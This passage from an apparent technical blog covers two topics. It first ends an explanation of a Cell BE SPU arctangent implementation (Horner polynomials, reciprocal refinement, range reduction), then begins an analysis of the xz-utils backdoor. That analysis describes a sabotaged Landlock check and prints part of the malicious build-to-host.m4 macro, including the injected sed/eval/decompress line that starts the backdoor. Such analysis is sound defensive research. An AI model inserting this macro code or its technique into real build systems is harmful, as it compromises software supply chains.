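<p>$$zden = q_4 + z \cdot (q_3 + z \cdot (q_2 + z \cdot (q_1 + z \cdot (q_0 + z))))$$</p><p>Here <code>z</code> stands for <code>xp2</code>, and <code>p_k</code> and <code>q_k</code> stand for <code>f_atan_pk</code> and <code>f_atan_qk</code>. Following the code, <code>f_atan_p0</code> ends up multiplying the highest power of <code>xp2</code>, and the denominator has an implicit leading coefficient of 1 because its first step is a plain add (<code>si_fa</code>) rather than an FMA. This nested evaluation is Horner's method, and it is particularly well-suited for architectures that support Fused Multiply-Add (FMA) instructions, as each level of nesting can be computed using a single FMA operation. This is precisely what the implementation does, using the <code>si_fma</code> intrinsic to perform each multiplication and addition in a single instruction.</p>
<p>The main advantage of Horner's method is that it minimizes the number of operations required to evaluate a polynomial. For a polynomial of degree n it requires only n multiplications and n additions, which is optimal in terms of operation count, and with FMA these collapse into n fused instructions. The price is that every step depends on the previous one, so the chain is strictly serial. (Estrin's scheme, a related method, instead splits the polynomial into independent sub-expressions to shorten that dependency chain at the cost of extra multiplications.)</p>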
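<p>The nested evaluation can be sketched in scalar C as follows. This is an illustration rather than the code from <code>_cp_fatan</code>: <code>horner_eval</code> is a hypothetical helper, and the coefficient order (highest power first) is chosen to mirror the <code>znum0</code> … <code>znum</code> chain shown earlier.</p>

```c
#include <stddef.h>

/* Evaluates c[0]*x^(n-1) + c[1]*x^(n-2) + ... + c[n-1], highest power first.
 * Each loop iteration is one multiply-add, which maps to a single si_fma on
 * the SPU (a compiler may or may not fuse it on other targets). */
static float horner_eval(const float *c, size_t n, float x)
{
    float acc = c[0];
    for (size_t i = 1; i < n; i++)
        acc = acc * x + c[i];
    return acc;
}
```

<p>For example, with coefficients <code>{2, 3, 4}</code> and <code>x = 2</code> the loop computes <code>(2 * 2 + 3) * 2 + 4 = 18</code>, using two multiply-adds for a degree-2 polynomial.</p>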
<p>However, evaluating the two polynomials is only half of the job. The SPU has no single-precision divide instruction, so the quotient <code>znum / zden</code> is formed by multiplying <code>znum</code> with a reciprocal of <code>zden</code>, and the hardware reciprocal estimate is too coarse to be used as-is. Here <code>zden_r0</code> is that initial estimate of <code>1 / zden</code>; its definition is not shown in this excerpt, but by analogy with the range-reduction code in the next section it is presumably produced by <code>si_frest</code> followed by <code>si_fi</code>. The estimate is refined with two fused operations. The first step computes the residual <code>1 - zden_r0 * zden</code> using the <code>si_fnms</code> (Fused Negative Multiply-Subtract) intrinsic:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zden_r1 = si_fnms(zden_r0, zden, f_one);
</code></pre>
<p><code>si_fnms(a, b, c)</code> computes <code>c - a * b</code>, so this yields <code>1.0 - zden_r0 * zden</code>. If <code>zden_r0</code> were exactly <code>1 / zden</code> the result would be zero; what is left over is the relative error of the estimate.</p>
<p>The second step folds that error back into the estimate using another FMA operation:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zden_r = si_fma(zden_r1, zden_r0, zden_r0);
</code></pre>
<p>This operation computes <code>zden_r1 * zden_r0 + zden_r0</code>, which equals <code>zden_r0 * (2 - zden * zden_r0)</code>, the standard Newton-Raphson update for a reciprocal. The result, <code>zden_r</code>, is a more accurate approximation of <code>1 / zden</code>.</p>
<p>With the refined reciprocal <code>zden_r</code>, the implementation can now perform the final division as a multiplication:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword zdiv = si_fm(znum, zden_r);
</code></pre>
<p>This step computes <code>zdiv = znum * zden_r ≈ znum / zden</code>, which is the value of the rational approximation.</p>
<p>The purpose of the refinement is to recover the precision that the raw estimate lacks. Each Newton-Raphson step roughly doubles the number of correct bits, so a single step is a cheap way to turn a coarse estimate into one that is usable for single-precision work, without ever issuing a divide.</p>
<p>Mathematically, the refinement process can be represented as follows:</p>
<p>Let <code>d = zden</code>, and let the estimate be <code>r0 = zden_r0 = (1 - ε) / d</code>, where <code>ε</code> is its relative error.</p>
<p>Then:</p>
<p>$$r_1 = 1 - r_0 \cdot d = \varepsilon$$</p><p>$$r = r_1 \cdot r_0 + r_0 = r_0 \cdot (1 + \varepsilon) = \frac{1 - \varepsilon^2}{d}$$</p><p>where <code>r1</code> is <code>zden_r1</code> and <code>r</code> is <code>zden_r</code>. The relative error drops from <code>ε</code> to <code>ε²</code>, so <code>zden_r</code> is a much better approximation of <code>1 / zden</code> than <code>zden_r0</code> was.</p>
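<p>Read as a reciprocal refinement, the <code>si_fnms</code>/<code>si_fma</code> pair is one Newton-Raphson step for <code>1 / zden</code>, followed by a multiply in place of a divide. A scalar sketch of that reading, with hypothetical helper names and the initial estimate passed in by the caller (on the SPU it would come from the hardware estimate instructions):</p>

```c
/* One Newton-Raphson step for 1/d, mirroring the fnms/fma pair:
 *   residual = 1 - estimate * d               (si_fnms)
 *   refined  = residual * estimate + estimate (si_fma) */
static float refine_reciprocal(float d, float estimate)
{
    const float residual = 1.0f - estimate * d;
    return residual * estimate + estimate;
}

/* Division replaced by a multiply with the refined reciprocal, like zdiv. */
static float divide_via_reciprocal(float num, float den, float estimate)
{
    return num * refine_reciprocal(den, estimate);
}
```

<p>Starting from <code>0.24</code> as an estimate of <code>1 / 4</code> (4% off), one step gives about <code>0.2496</code>, which is 0.16% off: the relative error has been squared.</p>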
<h2 id="heading-refining-values-through-range-reduction">Refining Values Through Range Reduction</h2>
<p>Range reduction is crucial for improving the accuracy and efficiency of the arctangent approximation. It involves mapping the input value <code>x</code> into a smaller range, where the arctangent function can be more accurately approximated using a polynomial.</p>
<p>The CELL BE, like most modern processors, represents single-precision (32-bit) and double-precision (64-bit) floating-point numbers using a fixed number of bits for the significand (mantissa) and exponent. This limited precision can lead to rounding errors when representing certain values or performing arithmetic operations. For example, when computing the arctangent function using a polynomial approximation, the input values may need to be divided or multiplied by certain constants. If these constants cannot be represented exactly in the floating-point format, rounding errors can accumulate throughout the computation, potentially leading to inaccurate results.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range0_mask = si_fcgt(pos_x, f_t3p8);
<span class="hljs-keyword">const</span> qword range1_gt_mask = si_fcgt(f_pt66, pos_x);
<span class="hljs-keyword">const</span> qword range1_eq_mask = si_fceq(f_pt66, pos_x);
<span class="hljs-keyword">const</span> qword range1_mask = si_or(range1_gt_mask, range1_eq_mask);
<span class="hljs-keyword">const</span> qword range2_mask = si_nor(range0_mask, range1_mask);
</code></pre>
<p>The <code>range0_mask</code> identifies cases where <code>pos_x</code> (the absolute value of the input <code>x</code>) is greater than <code>tan(3π/8)</code>, which is a constant value <code>f_t3p8</code>. The <code>si_fcgt</code> intrinsic performs a floating-point greater-than comparison.</p>
<p>The <code>range1_mask</code> identifies cases where <code>pos_x</code> is less than or equal to <code>0.66</code>, which is a constant value <code>f_pt66</code>. It is computed by combining two masks using <code>si_or</code>: <code>range1_gt_mask</code> (for <code>pos_x &lt; 0.66</code>) and <code>range1_eq_mask</code> (for <code>pos_x == 0.66</code>).</p>
<p>The <code>range2_mask</code> identifies the remaining cases that are not covered by <code>range0_mask</code> or <code>range1_mask</code>. It is computed by performing a bitwise NOR operation (<code>si_nor</code>) on <code>range0_mask</code> and <code>range1_mask</code>.</p>
<p>These range masks are used to select different computations and approximations for the arctangent function, based on the range in which the input value falls.</p>
<p>For the <code>range0</code> case, where <code>pos_x</code> is greater than <code>tan(3π/8)</code>, the range reduction involves computing <code>-1.0 / pos_x</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range0_x0 = si_frest(pos_x);
<span class="hljs-keyword">const</span> qword range0_x1 = si_fi(pos_x, range0_x0);
<span class="hljs-keyword">const</span> qword range0_x2 = si_fnms(range0_x1, pos_x, f_one);
<span class="hljs-keyword">const</span> qword range0_x3 = si_fma(range0_x2, range0_x1, range0_x1);
<span class="hljs-keyword">const</span> qword range0_x = si_xor(range0_x3, f_msb);
<span class="hljs-keyword">const</span> qword range0_y = f_pio2;
</code></pre>
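<p>The reciprocal is computed without a divide instruction: <code>si_frest</code> produces a reciprocal estimate, <code>si_fi</code> interpolates it, and the <code>si_fnms</code>/<code>si_fma</code> pair applies one Newton-Raphson refinement step. The result is then negated using an XOR operation with <code>f_msb</code> (which flips the sign bit), giving <code>range0_x = -1.0 / pos_x</code>. The corresponding <code>range0_y</code> value is set to <code>π/2</code>, since <code>atan(x) = π/2 + atan(-1/x)</code> for positive <code>x</code>.</p>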
<p>For the <code>range1</code> case, where <code>pos_x</code> is less than or equal to <code>0.66</code>, the range reduction is straightforward:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range1_x = pos_x;
<span class="hljs-keyword">const</span> qword range1_y = f_zero;
</code></pre>
<p>The <code>range1_x</code> value is simply set to <code>pos_x</code>, and the corresponding <code>range1_y</code> value is set to <code>0.0</code>.</p>
<p>For the <code>range2</code> case, which covers the remaining values of <code>pos_x</code>, the range reduction involves computing <code>(pos_x - 1.0) / (pos_x + 1.0)</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range2_y = f_pio4;
<span class="hljs-keyword">const</span> qword range2_x0num = si_fs(pos_x, f_one);
<span class="hljs-keyword">const</span> qword range2_x0den = si_fa(pos_x, f_one);
<span class="hljs-keyword">const</span> qword range2_x0 = si_frest(range2_x0den);
<span class="hljs-keyword">const</span> qword range2_x1 = si_fnms(range2_x0, range2_x0den, f_one);
<span class="hljs-keyword">const</span> qword range2_x2 = si_fma(range2_x1, range2_x0, range2_x0);
<span class="hljs-keyword">const</span> qword range2_x = si_fm(range2_x0num, range2_x2);
</code></pre>
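<p>Here too the division is replaced by a reciprocal estimate of the denominator (<code>si_frest</code>), one Newton-Raphson refinement (<code>si_fnms</code>, <code>si_fma</code>) and a final multiplication with the numerator (<code>si_fm</code>). The corresponding <code>range2_y</code> value is set to <code>π/4</code>, following <code>atan(x) = π/4 + atan((x - 1) / (x + 1))</code>.</p>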
<p>After computing the range-specific values (<code>range0_x</code>, <code>range1_x</code>, <code>range2_x</code>, <code>range0_y</code>, <code>range1_y</code>, <code>range2_y</code>), the appropriate values are selected based on the range masks:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword range_x0 = si_selb(range2_x, range0_x, range0_mask);
<span class="hljs-keyword">const</span> qword range_x = si_selb(range_x0, range1_x, range1_mask);
<span class="hljs-keyword">const</span> qword range_y0 = si_selb(range2_y, range0_y, range0_mask);
<span class="hljs-keyword">const</span> qword range_y = si_selb(range_y0, range1_y, range1_mask);
</code></pre>
<p>The <code>si_selb</code> intrinsic is used to perform a conditional selection operation, selecting the first value if the corresponding mask bit is <code>0</code>, and the second value if the mask bit is <code>1</code>. The range-specific values <code>range_x</code> and <code>range_y</code> are then used in the subsequent polynomial approximation step of the <code>_cp_fatan</code> function.</p>
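<p>For readers without an SPU at hand, the select-by-mask idea can be emulated on a single 32-bit lane. This is a sketch of the semantics described above, not of the intrinsic itself; <code>select_bits</code> and <code>select_if_greater</code> are hypothetical names.</p>

```c
#include <stdint.h>
#include <string.h>

/* Bitwise select on one 32-bit lane: takes bits from a where mask is 0
 * and from b where mask is 1, as described for si_selb. */
static uint32_t select_bits(uint32_t a, uint32_t b, uint32_t mask)
{
    return (a & ~mask) | (b & mask);
}

/* Float wrapper: the comparison result is widened to an all-ones or
 * all-zeros mask, the way a per-lane compare such as si_fcgt produces it. */
static float select_if_greater(float x, float threshold, float if_not, float if_so)
{
    uint32_t a, b, out;
    const uint32_t mask = (x > threshold) ? 0xFFFFFFFFu : 0u;
    float result;

    memcpy(&a, &if_not, sizeof a); /* reinterpret the bits without aliasing issues */
    memcpy(&b, &if_so, sizeof b);
    out = select_bits(a, b, mask);
    memcpy(&result, &out, sizeof result);
    return result;
}
```

<p>Because the mask is either all ones or all zeros per lane, the select never mixes bits from the two candidates; both are always computed, and the mask only decides which one survives. That is what lets the code avoid branches entirely.</p>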
<p>The purpose of this range reduction is to map the input value <code>x</code> into a small interval around zero (with the thresholds used here, roughly [-0.42, 0.66]), where the arctangent function can be accurately approximated with a low-degree polynomial. By decomposing the input range into multiple sub-ranges and applying a different reduction to each, the implementation achieves higher accuracy and efficiency than a single approximation over the whole input range could.</p>
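<p>The three ranges can be checked end to end with a scalar sketch. Two things here are assumptions made for illustration: the helper names are hypothetical, and a truncated Taylor series stands in for the rational approximation (the actual <code>f_atan_p*</code>/<code>f_atan_q*</code> coefficients are not shown in this section), which only works because the reduced argument stays small.</p>

```c
/* Stand-in for the rational approximation: truncated Taylor series
 * r - r^3/3 + r^5/5 - ..., adequate only for |r| <= 0.66. */
static double atan_small(double r)
{
    const double r2 = r * r;
    double term = r, sum = 0.0;
    for (int k = 0; k < 40; k++) {
        sum += term / (2 * k + 1);
        term = -term * r2;
    }
    return sum;
}

/* atan(x) via the three ranges: atan(|x|) = y + atan(reduced). */
static double atan_reduced(double x)
{
    const double T3P8 = 2.414213562373095;  /* tan(3*pi/8) */
    const double PIO2 = 1.5707963267948966; /* pi/2 */
    const double PIO4 = 0.7853981633974483; /* pi/4 */
    const double ax = x < 0.0 ? -x : x;
    double reduced, y;

    if (ax > T3P8) {            /* range0: -1/x, offset pi/2 */
        reduced = -1.0 / ax;
        y = PIO2;
    } else if (ax <= 0.66) {    /* range1: x itself, offset 0 */
        reduced = ax;
        y = 0.0;
    } else {                    /* range2: (x-1)/(x+1), offset pi/4 */
        reduced = (ax - 1.0) / (ax + 1.0);
        y = PIO4;
    }
    const double result = y + atan_small(reduced);
    return x < 0.0 ? -result : result; /* atan is an odd function */
}
```

<p>Unlike the SPU version, this sketch branches instead of computing all three candidates and selecting by mask; the arithmetic per range is the same.</p>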
<h2 id="heading-special-case-handling-for-weird-values">Special Case Handling for Weird Values</h2>
<p>We also need to handle exceptional inputs such as zero, infinity, and NaN (Not a Number). Handling them explicitly makes sure the approximation adheres to the mathematical definition and produces correct results in corner cases that would otherwise lead to undefined or incorrect behavior.</p>
<h3 id="heading-positive-and-negative-infinite-inputs">Positive and Negative Infinite Inputs</h3>
<p>When one of the inputs (x or y) is infinite, the mathematical behavior of the atan2(y, x) function needs to be explicitly defined. For example, when y is positive infinity and x is negative infinity, the result should be 3π/4 radians. These cases cannot be handled by the general polynomial approximation used for finite input values.</p>
<p>Masks <code>x_eqinf_mask</code> and <code>x_eqninf_mask</code> are created using <code>si_fceq</code> to identify if <code>x</code> is equal to positive or negative infinity, respectively.</p>
<p>If <code>x</code> is positive infinity, the result should be <code>π/2</code>. This is achieved by selecting between <code>result_y0</code> (the result from the previous step) and <code>f_pio2</code> (the constant value for <code>π/2</code>) based on the <code>x_eqinf_mask</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result_y1 = si_selb(result_y0, f_pio2, x_eqinf_mask);
</code></pre>
<p>If <code>x</code> is negative infinity, the result should be <code>-π/2</code>. This is achieved by selecting between <code>result_y1</code> (the result from the previous step) and <code>f_npio2</code> (the constant value for <code>-π/2</code>) based on the <code>x_eqninf_mask</code>:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result = si_selb(result_y1, f_npio2, x_eqninf_mask);
</code></pre>
<h3 id="heading-if-input-is-zero">If Input is Zero</h3>
<p>When one or both inputs are zero, the mathematical behavior of atan2(y, x) becomes undefined or depends on the specific signs of x and y. For instance, when y is 0 and x is negative, the result should be π radians, while when y is 0 and x is positive, the result should be 0 radians. These cases require special handling to ensure correct results.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword x_eqz_mask = si_fceq(f_zero, x);
<span class="hljs-keyword">const</span> qword result_y0 = si_selb(pos_yaddz, x, x_eqz_mask);

<span class="hljs-keyword">const</span> qword x_eqinf_mask = si_fceq(f_inf, x);
<span class="hljs-keyword">const</span> qword x_eqninf_mask = si_fceq(f_ninf, x);
<span class="hljs-keyword">const</span> qword result_y1 = si_selb(result_y0, f_pio2, x_eqinf_mask);
<span class="hljs-keyword">const</span> qword result = si_selb(result_y1, f_npio2, x_eqninf_mask);
</code></pre>
<p>The first step is to identify if the input <code>x</code> is equal to <code>0.0</code> using the <code>si_fceq</code> intrinsic, which performs a floating-point equal-to comparison. The result is stored in the <code>x_eqz_mask</code>.</p>
<p>If <code>x</code> is equal to <code>0.0</code>, the result should be <code>0.0</code>. This is achieved by selecting between <code>pos_yaddz</code> (the computed arctangent value from the previous steps) and <code>x</code> (which is <code>0.0</code>) based on the <code>x_eqz_mask</code>. The <code>si_selb</code> intrinsic is used for this conditional selection operation:</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword result_y0 = si_selb(pos_yaddz, x, x_eqz_mask);
</code></pre>
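<p>Put together, the zero and infinity overrides form a short chain of selections applied on top of the computed value. A scalar sketch of that chain, with a hypothetical function name and ordinary comparisons in place of the mask-and-select intrinsics:</p>

```c
#include <math.h> /* INFINITY macro only; no libm functions are called */

/* Applies the zero and infinity overrides to an already computed value,
 * in the same order as the selections in the original code. */
static float apply_special_cases(float x, float computed)
{
    const float PIO2 = 1.57079632679f;
    float result = computed;

    if (x == 0.0f)      result = x;     /* returns x itself, so -0.0f stays -0.0f */
    if (x == INFINITY)  result = PIO2;
    if (x == -INFINITY) result = -PIO2;
    return result;
}
```

<p>Returning <code>x</code> rather than a constant <code>0.0</code> for the zero case is a small design choice worth noticing: it keeps the sign of a negative zero without needing a separate check.</p>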
<h3 id="heading-not-a-number-nan">Not a Number (NaN)</h3>
<p>If either x or y is NaN, the result of atan2(y, x) should also be NaN, according to the <a target="_blank" href="https://christophervickery.com/babbage/IEEE-754.old/References.xhtml">IEEE 754 floating-point standard</a>. NaN values represent invalid or undefined results, and they need to be propagated correctly through mathematical operations. The CELL BE itself supports various rounding modes, including round-to-nearest, round-toward-positive-infinity, round-toward-negative-infinity, and round-toward-zero. Note that this applies to the PPE and to double-precision arithmetic on the SPU; single-precision SPU instructions, which the code above uses, always round toward zero. The choice of rounding mode can affect the final result, especially when dealing with exceptional values or inputs near the boundaries of the representable range. For example, when computing atan2(y, x) with x or y close to zero, the rounding mode can determine whether the result is rounded to zero or a non-zero value.</p>
<p>The PPE provides IEEE-style hardware support for exceptional floating-point values like infinities and NaNs (Not a Number), whereas single-precision arithmetic on the SPU treats those bit patterns as ordinary large numbers, which makes explicit mask-based checks like the ones above all the more important. Even with hardware support, the behavior of arithmetic operations involving these values may not always be intuitive or consistent across different scenarios. For example, when computing atan2(y, x) with one input being infinity and the other being a finite value, the result can depend on the specific signs of the inputs and may require special handling to ensure accurate and consistent behavior.</p>
<h1 id="heading-thoughts-and-conclusions">Thoughts and Conclusions</h1>
<p>One key advantage of a SPE-centric approach to vectorizing mathematical functions is that it can potentially unlock higher levels of parallelism and efficiency, as the SPEs are not constrained by the need to continuously communicate with the PPE. This can be particularly beneficial for workloads that can be effectively parallelized and distributed across the multiple SPEs.</p>
<p>SPUs also feature a "SIMD-type instruction set" and 128-bit registers that can hold vectors of 32/16-bit fixed-point or floating-point values. This SIMD architecture is well suited to performing the same operation on multiple data elements in parallel. The floating-point unit, capable of single-precision (32-bit) and double-precision (64-bit) operations, also helps here.</p>
<p>However, adopting an SPE-centric programming model also introduces several challenges. Developers must carefully partition the data and tasks to be processed by each SPE, ensuring that there are no conflicts or race conditions when multiple SPEs access shared data structures concurrently. Proper synchronization mechanisms, such as locks or barriers, must be employed to maintain data coherency.</p>
<p>And while the PPE is responsible for initially setting up tasks and allocating resources, the SPEs may still require some level of dynamic resource management during execution. Mechanisms for requesting and releasing resources, such as memory or hardware accelerators, may need to be implemented.</p>
<p>In a distributed computing environment like the SPE-centric model, fault tolerance and error handling also become more critical. Mechanisms must be in place to detect and recover from potential failures or errors in individual SPEs, as well as to gracefully handle scenarios where one or more SPEs become unavailable.</p>
<p>And finally, codebases implementing SPE-centric algorithms may be more challenging to port to other platforms that do not share the same heterogeneous architecture as the Cell BE. This can potentially limit the reusability and portability of the codebase across different hardware targets. This is partly why <a target="_blank" href="https://www.youtube.com/watch?v=mvgGVF4Axjs">PS3 emulation</a> has been such a tough nut to crack, with Sony themselves dropping backwards compatibility support for the PS3 in the PS4.</p>
<p>Despite its initial hype and potential, the Cell processor ultimately failed to gain widespread adoption and became an architectural dead-end.</p>
<p>One of the fundamental reasons for the Cell's failure can be attributed to the breakdown of Dennard scaling. Dennard scaling, a principle that governed transistor behavior for several decades, predicted that as transistors became smaller, their power density would remain constant, allowing for higher clock speeds without increasing power consumption or heat generation.</p>
<p>The Cell processor was designed during an era when engineers were still expecting to achieve clock speeds of 5GHz or higher in consumer electronics chips. However, as the Dennard scaling limitations became apparent, the Cell's design, which relied heavily on high clock speeds, became increasingly untenable. As a result, the processor had to be pigeon-holed into a role it was not originally designed for, and Sony had to hastily integrate a separate GPU from NVIDIA to compensate for the Cell's underperforming graphics capabilities, which led to some <a target="_blank" href="https://en.wikipedia.org/wiki/RSX_Reality_Synthesizer#Bumpgate">production issues</a>.</p>
<p>Beyond the hardware limitations, the tooling and documentation for the Cell were widely criticized, further compounding the challenges developers faced in effectively utilizing the processor's capabilities. Sony was probably also looking to discourage developers from making their games multiplatform, which may be why ports of many PS3 games to other platforms only started to appear recently.</p>
<p>While the Cell processor represented an ambitious and innovative effort to push the boundaries of parallel computing, its performance in more general-purpose computing tasks was often lackluster due to the programming challenges and the inherent limitations of its architecture (despite it excelling in certain embarrassingly parallel workloads, such as matrix math and password cracking). While there was hype regarding its initial potential for certain specialized workloads, the Cell processor's unconventional design proved to be a misstep, and it ultimately faded into obscurity.</p>
<p>Speaking of processor designs, next article might be about CUDA kernels, but idk tho lol.</p>
]]></content:encoded></item><item><title><![CDATA[Dissecting the xz-utils Backdoor]]></title><description><![CDATA[Cover Illustration by cloudnienty

On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used xz/liblzma package, a program for interacting with lzma-based compressed files. The backdoor was discovered by a Microsoft e...]]></description><link>https://research.meekolab.com/dissecting-the-xz-utils-backdoor</link><guid isPermaLink="true">https://research.meekolab.com/dissecting-the-xz-utils-backdoor</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 12 Apr 2024 15:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712416814857/287a147d-0ec5-420c-a7b2-b4872076d650.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by cloudnienty</em></strong></p>
</blockquote>
<p>On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used <code>xz</code>/<code>liblzma</code> package, a program for interacting with <code>lzma</code>-based compressed files. The backdoor was discovered by a <a target="_blank" href="https://www.openwall.com/lists/oss-security/2024/03/29/4">Microsoft engineer who saw that his program was executing 500 ms slower</a> (which is pretty rad ngl, 10x engineer type shit).</p>
<p>While many have publicly called this an OpenSSH authentication bypass, this is actually a more complex remote code execution attack, with the payload separated into four different stages, all of them heavily obfuscated.</p>
<p>This post might contain inaccurate or incomplete analysis, as this is a currently developing situation with many in the industry trying to make sense of this entire mess. This article also uses some research tidbits and references from the following articles:</p>
<ul>
<li><p>Initial <a target="_blank" href="https://www.openwall.com/lists/oss-security/2024/03/29/4">Openwall</a> post by Andres Freund</p>
</li>
<li><p><a target="_blank" href="https://research.swtch.com/xz-script">research!rsc post</a> about the shell script by Russ Cox</p>
</li>
<li><p><a target="_blank" href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">smx-smx Github Gist</a> about the (WIP) dynamic analysis of the compiled binary by Stefano Moioli</p>
</li>
<li><p><a target="_blank" href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky Thread</a> about the Ed448 authentication mechanism for the RCE by Filippo Valsorda</p>
</li>
</ul>
<h2 id="heading-pre-exploit-activity">Pre-Exploit Activity</h2>
<p>The GitHub user responsible, who is using the alias Jia Tan, seemed to have worked tirelessly to obscure his activity through reverse engineering his way into backdooring the repo for more than two years. But while his [TBA]</p>
<h3 id="heading-disabling-of-linux-landlock">Disabling of Linux Landlock</h3>
<p>It seems like the threat actor disabled a piece of code in the <code>xz</code> repository by making subtle changes to a script used to check for <a target="_blank" href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>, which is a security module that allows applying strict rules to limit the system calls and filesystem access of user processes, enhancing security through sandboxing.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1712217589898/ea06189d-5b1f-4730-859a-28368305f84b.png" alt class="image--center mx-auto" /></p>
<p>In the diff, the following changes are made:</p>
<ol>
<li><p>Adding a dot (.) at the end of the <code>my_sandbox</code> function definition (line 8), which introduces a syntax error in the C code and prevents it from compiling, so the feature check fails and landlock support is silently treated as unavailable</p>
</li>
<li><p>Changing the letter 'C' in "LINUX_LANDLOCK" to a Cyrillic 'C' (line 25 and line 27), which creates a subtle difference in the string that can bypass string comparison checks</p>
</li>
</ol>
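<p>To make the second point concrete, here is a small sketch of why a homoglyph defeats a string comparison. It assumes the substituted character is the Cyrillic capital Es (U+0421), which is the usual lookalike for a Latin 'C'; the variable and function names are hypothetical.</p>

```c
#include <string.h>

/* "LINUX_LANDLOCK" with the Latin 'C' (one byte, 0x43). */
static const char latin_name[] = "LINUX_LANDLOCK";
/* Same text with Cyrillic capital Es, U+0421, encoded in UTF-8 as 0xD0 0xA1. */
static const char cyrillic_name[] = "LINUX_LANDLO\xD0\xA1K";

/* Returns 1 when the two identifiers are byte-for-byte identical. */
static int same_identifier(const char *a, const char *b)
{
    return strcmp(a, b) == 0;
}
```

<p>The two strings look the same in most fonts, but one is 14 bytes and the other 15, so any exact match against the real name fails while a human reviewer skimming the diff is unlikely to notice.</p>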
<p>The landlock bypass affects the <code>xz</code> component, and not the <code>liblzma</code> component. So it's possible that this was made in preparation for a separate payload that was still under construction.</p>
<h3 id="heading-initial-backdoor-component-in-upstream-branch">Initial Backdoor Component in Upstream Branch</h3>
<p>We can see in the .git commit history that the initial component of the backdoor compilation process <code>build-to-host.m4</code> is excluded through gitignore in the main branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711900885015/39c70c70-8f6e-476e-8252-3ad88176d693.png" alt class="image--center mx-auto" /></p>
<p>Instead, we can see the file in the <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63">upstream version</a> in the <code>debian/unstable</code> branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711903617262/3db3073c-3bcf-4799-965a-300abc94189e.jpeg" alt class="image--center mx-auto" /></p>
<p>While GitHub automatically generates a tarball from the git tag, maintainers also have the option to upload additional files alongside the automatic ones. This functionality is a double-edged sword.</p>
<p>On one hand, it allows maintainers to include necessary generated files that are not part of the git repository, such as configuration scripts. On the other hand, it opens the door to potential misuse if someone with access adds files that are not part of the official source.</p>
<p>Automatically generated archives might not be sufficient for complex projects, and one of the solutions might be building directly from a checked-out git tag. However, such changes would complicate the build and packaging processes, particularly for distributions like Debian, which often use patches and require additional files that aren't part of the upstream source.</p>
<hr />
<h2 id="heading-obfuscation-routine">Obfuscation Routine</h2>
<h3 id="heading-stage-1-build-to-hostm4">Stage 1 : <code>build-to-host.m4</code></h3>
<p>The exploit starts with this <code>build-to-host</code> file, which is an Autoconf macro file used to handle file name translations between the build environment and the target runtime environment. This is necessary when the build environment (e.g., the system where the software is being compiled) is different from the target runtime environment (e.g., the system where the compiled software will be executed).</p>
<p>The code has a very interesting tidbit, especially in the <code>somedir_c_make</code> definition on <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63">Line 63</a>:</p>
<pre><code class="lang-bash">dnl Define somedir_c_make.
[<span class="hljs-variable">$1</span>]_c_make=`<span class="hljs-built_in">printf</span> <span class="hljs-string">'%s\n'</span> <span class="hljs-string">"$[<span class="hljs-variable">$1</span>]_c"</span> | sed -e <span class="hljs-string">"<span class="hljs-variable">$gl_sed_escape_for_make_1</span>"</span> -e <span class="hljs-string">"<span class="hljs-variable">$gl_sed_escape_for_make_2</span>"</span> | tr -d <span class="hljs-string">"<span class="hljs-variable">$gl_tr_cr</span>"</span>`
dnl Use the substituted somedir variable, when possible, so that the user
dnl may adjust somedir a posteriori when there are no special characters.
 <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> <span class="hljs-string">"$[<span class="hljs-variable">$1</span>]_c_make"</span> = <span class="hljs-string">'\"'</span><span class="hljs-string">"<span class="hljs-variable">${gl_final_[$1]}</span>"</span><span class="hljs-string">'\"'</span>; <span class="hljs-keyword">then</span>
   [<span class="hljs-variable">$1</span>]_c_make=<span class="hljs-string">'\"$([$1])\"'</span>
 <span class="hljs-keyword">fi</span>
 <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> <span class="hljs-string">"x<span class="hljs-variable">$gl_am_configmake</span>"</span> != <span class="hljs-string">"x"</span>; <span class="hljs-keyword">then</span>
   gl_[<span class="hljs-variable">$1</span>]_config=<span class="hljs-string">'sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null'</span>
 <span class="hljs-keyword">else</span>
   gl_[<span class="hljs-variable">$1</span>]_config=<span class="hljs-string">''</span>
 <span class="hljs-keyword">fi</span>
 _LT_TAGDECL([], [gl_path_map], [2])dnl
 _LT_TAGDECL([], [gl_[<span class="hljs-variable">$1</span>]_prefix], [2])dnl
 _LT_TAGDECL([], [gl_am_configmake], [2])dnl
 _LT_TAGDECL([], [[<span class="hljs-variable">$1</span>]_c_make], [2])dnl
 _LT_TAGDECL([], [gl_[<span class="hljs-variable">$1</span>]_config], [2])dnl
 AC_SUBST([<span class="hljs-variable">$1_c_make</span>])
</code></pre>
